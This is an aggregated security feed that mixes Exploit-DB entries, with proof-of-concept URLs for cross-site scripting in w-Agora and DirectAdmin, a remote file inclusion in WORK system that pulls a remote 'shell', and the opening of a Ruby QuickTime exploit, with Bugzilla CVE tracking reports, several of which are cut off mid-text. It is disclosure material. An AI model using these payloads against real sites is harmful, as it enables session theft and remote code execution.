w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
w-Agora 4.2.1 is vulnerable.
http://www.example.com/w-agora/change_password.php?newpasswd1=1&newpasswd2=1&passwd=1&site=hello&userid='">alert(documen t.cookie)
Exploit-DB
DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting
exploitdb·2007-03-16
CVE-2007-1508 DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting
DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/22996/info
DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/CMD_USER_STATS?RESULT='http://example2.com/script.js'
Exploit-DB
work system E-Commerce 3.0.5 - Remote File Inclusion
exploitdb·2007-03-10
CVE-2007-1423 work system E-Commerce 3.0.5 - Remote File Inclusion
work system E-Commerce 3.0.5 - Remote File Inclusion
---
#####################################################################################
Rodrigo Duarte
Wuefez[AT]2die4.com ;D
WORK system e-commerce:
WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow,
content,package,language,currency,country,price,stock,group user,CSS,banner,logo,
link,partner,forum,new,FAQ,event,calendar,invoice,mailing,supplier,RSS, webservices.
Vulnerable Script:
~ include_top.php
(Other scripts of this project are also vulnerable with $g_include)
Vulnerable Code:
include ($g_include."include_logo.php");
PoC:
http://example/[WORK_system_path]/include/include_top.php?g_include=http://shell
d0rk:
[your_creativity_here]
greetz:
Cocada, FoNSECA, maxim noob
SHiKaA, ZeUsSixSixS
Exploit-DB
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
exploitdb·2007-01-03
CVE-2007-0059 Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
---
#!/usr/bin/ruby
#
# (c) 2006 LMH
# Original scripting and POC by Aviv Raff (http://aviv.raffon.net).
#
# Description:
# Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the
# fake FTP server (required). HTTP server port can be modified but it's
# not recommended. Adjust as necessary.
#
# see http://projects.info-pull.com/moab/MOAB-03-01-2007.html
require 'socket'
require 'fileutils'
require 'webrick'
trap 0, proc {
puts "-- Terminating: #{$$}"
}
REMOTE_HOST = "192.168.1.133" # Modify to match IP address or hostname
REMOTE_URL = "http://#{REMOTE_HOST}/" # Modify to match target path (ex. /mypath)
TARGET_SCRIPT = "on error resume next\r\n" +
"Set c = CreateObject(\"ADODB.Connection\")\r\n
Bugzilla
CVE-2022-50068 kernel: drm/ttm: Fix dummy res NULL ptr deref bug
bugzilla·2025-06-18·CVSS 5.5
CVE-2022-50068 [MEDIUM] CVE-2022-50068 kernel: drm/ttm: Fix dummy res NULL ptr deref bug
CVE-2022-50068 kernel: drm/ttm: Fix dummy res NULL ptr deref bug
In the Linux kernel, the following vulnerability has been resolved:
drm/ttm: Fix dummy res NULL ptr deref bug
Check the bo->resource value before accessing the resource
mem_type.
v2: Fix commit description unwrapped warning
[ 40.191227][ T184] general protection fault, probably for non-canonical address 0xdffffc0000000002: 0000 [#1] SMP KASAN PTI
[ 40.192995][ T184] KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]
[ 40.194411][ T184] CPU: 1 PID: 184 Comm: systemd-udevd Not tainted 5.19.0-rc4-00721-gb297c22b7070 #1
[ 40.196063][ T184] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
[ 40.199605][ T184] RIP: 0010:ttm_bo_validate+0x1b3/0x240 [ttm]
[ 40.2007
Bugzilla
CVE-2007-0899 clamav: heap based overflow in libclamav/fsg.c
bugzilla·2019-11-12·CVSS 9.8
CVE-2007-0899 [CRITICAL] CVE-2007-0899 clamav: heap based overflow in libclamav/fsg.c
CVE-2007-0899 clamav: heap based overflow in libclamav/fsg.c
There is a possible heap overflow in libclamav/fsg.c before 0.100.0.
Reference:
https://security-tracker.debian.org/tracker/CVE-2007-0899
Discussion:
Created clamav tracking bugs for this issue:
Affects: epel-all [bug 1771395]
Affects: fedora-all [bug 1771394]
---
(In reply to Dhananjay Arunesh from comment #0)
> There is a possible heap overflow in libclamav/fsg.c before 0.100.0.
>
> Reference:
> https://security-tracker.debian.org/tracker/CVE-2007-0899
https://apps.fedoraproject.org/packages/clamav
Rawhide 0.101.4-1.fc32 None
Fedora 32 0.101.4-1.fc32 None
Fedora 31 0.101.4-1.fc31 None
Fedora 30 0.101.4-1.fc30 (update) None
Fedora 29 0.101.4-1.fc29 (update) None
Fedora EPEL 8 0.101.4-1.el8 None
Fedora EPEL 7 0.101.4-1.e
Bugzilla
CVE-2007-3962 fsplib multiple buffer overflows
bugzilla·2007-08-10·CVSS 7.5
CVE-2007-3962 [HIGH] CVE-2007-3962 fsplib multiple buffer overflows
CVE-2007-3962 fsplib multiple buffer overflows
Multiple stack-based buffer overflows in fsplib.c in fsplib before 0.9 might
allow remote attackers to execute arbitrary code via (1) a long filename that is
not properly handled by the fsp_readdir_native function when MAXNAMLEN is
greater than 255, or (2) a long d_name directory (dirent) field in the
fsp_readdir function.
gFTP contains local copy of fsplib source code to support FSP protocol.
Discussion:
fsplib upstream patches:
http://fsp.cvs.sourceforge.net/fsp/fsplib/fsplib.c?r1=1.17&r2=1.18
http://fsp.cvs.sourceforge.net/fsp/fsplib/fsplib.c?r1=1.21&r2=1.22
http://fsp.cvs.sourceforge.net/fsp/fsplib/fsplib.h?r1=1.12&r2=1.13
gFTP patch:
http://svn.gnome.org/viewcvs/gftp/trunk/lib/fsplib/fsplib.c?r1=747&r2=768
---
Both issue only aff
Bugzilla
CVE-2007-3387 xpdf integer overflow [F7]
bugzilla·2007-08-09·CVSS 6.8
CVE-2007-3387 [MEDIUM] CVE-2007-3387 xpdf integer overflow [F7]
CVE-2007-3387 xpdf integer overflow [F7]
F7 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
cups-1.2.12-4.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
Bugzilla
CVE-2007-2876 {ip, nf}_conntrack_sctp: remotely triggerable NULL ptr dereference
bugzilla·2007-06-11·CVSS 6.1
CVE-2007-2876 [MEDIUM] CVE-2007-2876 {ip, nf}_conntrack_sctp: remotely triggerable NULL ptr dereference
CVE-2007-2876 {ip, nf}_conntrack_sctp: remotely triggerable NULL ptr dereference
+++ This bug was initially created as a clone of Bug #243245 +++
From Vilmos Nebehaj:
When creating a new connection by sending an unknown chunk type, we don't
transition to a valid state, causing a NULL pointer dereference in sctp_packet
when accessing sctp_timeouts[SCTP_CONNTRACK_NONE].
Discussion:
This request was evaluated by Red Hat Product Management for inclusion in a Red
Hat Enterprise Linux maintenance release. Product Management has requested
further review of this request by Red Hat Engineering, for potential
inclusion in a Red Hat Enterprise Linux Update release for currently deployed
products. This request is not yet committed for inclusion in an Update
release.
---
committed in stream rhel
Bugzilla
CVE-2007-2052 Off-by-one in python's locale.strxfrm()
bugzilla·2007-04-03·CVSS 5.0
CVE-2007-2052 [MEDIUM] CVE-2007-2052 Off-by-one in python's locale.strxfrm()
CVE-2007-2052 Off-by-one in python's locale.strxfrm()
+++ This bug was initially created as a clone of Bug #235093 +++
Description of problem:
Modules/_localemodule.c:361
356 n1 = strlen(s) + 1;
357 buf = PyMem_Malloc(n1);
358 if (!buf)
359 return PyErr_NoMemory();
360 n2 = strxfrm(buf, s, n1);
In case the transformed string is longer than original string...
(see the PoC for an exapmle)
361 if (n2 > n1) {
362 /* more space needed */
We allocate n2 bytes here:
363 buf = PyMem_Realloc(buf, n2);
364 if (!buf)
365 return PyErr_NoMemory();
And here the string will be n2 chars long and terminating NUL won't
fit and thus the string won't be terminated what can lead to an
information leak in certain rare cases (see the original Debian report
for details).
366 strxfrm(buf, s, n2);
367 }
36
Bugzilla
CVE-2007-0994 Thunderbird arbitrary javascript command execution
bugzilla·2007-03-02·CVSS 6.8
CVE-2007-0994 [MEDIUM] CVE-2007-0994 Thunderbird arbitrary javascript command execution
CVE-2007-0994 Thunderbird arbitrary javascript command execution
A bug was found in the way Thunderbird handles tags. To quote the
upstream bug:
When javascript: url is set by script, the access checks work properly.
i.src = "javascript:...";
But, when javascript: url is set by (or , ) tag, the access
checks don't work properly.
Thus, sandboxed script can access xbl.method's clone parent and xbl compilation
scope to run arbitrary code with chrome privileges.
Discussion:
Lifting embargo
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
Bugzilla
CVE-2007-0653 XMMS multiple issues (CVE-2007-0654)
bugzilla·2007-02-09·CVSS 9.3
CVE-2007-0653 [CRITICAL] CVE-2007-0653 XMMS multiple issues (CVE-2007-0654)
CVE-2007-0653 XMMS multiple issues (CVE-2007-0654)
Sven Krewitt of Secunia reported two flaws he discovered in the way XMMS handles
skin files. Here are the technical details provided by Sven:
--- Details ---
CVE-2007-0654
1) An integer underflow error exists when loading skin bitmap images,
which can be exploited to cause a stack-based buffer overflow via
specially crafted skin images containing manipulated header information.
The vulnerability is caused due to errors within "read_bmp()" in
xmms/bmp.c when loading skin bitmap images.
-- xmms/bmp.c --
GdkPixmap *read_bmp(gchar * filename)
[...]
fseek(file, 8, SEEK_CUR);
read_le_long(file, &offset); <-- [1]
read_le_long(file, &headSize);
[...]
else if (bitcount != 24 && bitcount != 16 && bitcount != 32)
{
gint ncols, i;
ncols = offset
2007-04-12
Published